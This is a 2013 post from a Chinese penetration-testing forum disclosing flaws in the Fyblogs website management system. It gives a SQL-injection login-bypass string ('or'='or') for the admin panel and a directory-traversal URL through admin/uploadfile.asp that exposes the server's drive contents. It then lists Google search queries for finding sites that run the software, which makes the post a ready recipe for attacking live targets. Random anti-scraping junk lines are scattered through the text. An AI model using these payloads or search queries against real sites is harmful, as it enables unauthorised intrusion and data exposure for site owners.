中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:17
标题:
Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
0 b8 [2 @& X: ^0 v2 ^
- I, W% U9 M7 }4 @
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
2 ]- l% p5 {& K1 X7 L' b
admin/uploadfile.asp?currentFolder=/upfiles/../
. t) l: E: t- ~# q2 V! R
8 A) E/ f+ t4 V5 i7 P" K9 b
漏洞证明:
1 k2 K/ {0 _/ A8 f
0 C! x$ ^% }6 ]2 r; }6 r; Z7 N _
谷歌:inurl:type.asp?id=1 新闻中心
+ H- H: J1 [! A4 M3 }, t* A
或者 :inurl:download_ok.asp?
; D; W/ |. j8 L* |" f g8 h0 q
3 E+ E1 J6 t' \( Q( ]) @
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2